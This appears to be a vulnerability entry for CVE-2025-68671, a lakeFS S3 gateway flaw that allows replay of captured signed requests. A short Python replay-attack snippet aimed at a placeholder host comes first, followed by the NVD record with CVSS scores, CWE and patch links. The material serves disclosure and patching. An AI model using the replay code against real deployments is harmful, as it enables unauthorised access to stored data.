CVE-2025-68671

import requests import time target_url = 'https://lakefs.example.com/s3/' original_request = { 'method': 'GET', 'path': '/bucket/key', 'headers': { 'Authorization': 'AWS4-HMAC-SHA256 ...', 'X-Amz-Date': time.strftime('%Y%m%dT%H%M%SZ') } } # 重放攻击示例 for i in range(5): response = requests.request(**original_request) print(f'Request {i+1}: {response.status_code}')

{"cve": {"id": "CVE-2025-68671", "sourceIdentifier": "[email protected]", "published": "2026-01-15T23:15:49.573", "lastModified": "2026-02-25T15:03:23.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "lakeFS is an open-source tool that transforms object storage into a Git-like repositories. LakeFS's S3 gateway does not validate timestamps in authenticated requests, allowing replay attacks. Prior to 1.75.0, an attacker who captures a valid signed request (e.g., through network interception, logs, or compromised systems) can replay that request until credentials are rotated, even after the request is intended to expire. This vulnerability is fixed in 1.75.0."}, {"lang": "es", "value": "lakeFS es una herramienta de código abierto que transforma el almacenamiento de objetos en repositorios tipo Git. El gateway S3 de lakeFS no valida las marcas de tiempo en las solicitudes autenticadas, lo que permite ataques de repetición. Antes de la 1.75.0, un atacante que captura una solicitud firmada válida (por ejemplo, mediante intercepción de red, registros o sistemas comprometidos) puede repetir esa solicitud hasta que las credenciales sean rotadas, incluso después de que la solicitud esté destinada a expirar. Esta vulnerabilidad está corregida en la 1.75.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lakefs:lakefs:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.75.0", "matchCriteriaId": "1A4347A4-1048-4A23-AE88-001ABB5657BF"}]}]}], "references": [{"url": "https://github.com/treeverse/lakeFS/commit/92966ae611d7f1a2bbe7fd56f9568c975aab2bd8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/treeverse/lakeFS/issues/9599", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-f2ph-gc9m-q55f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}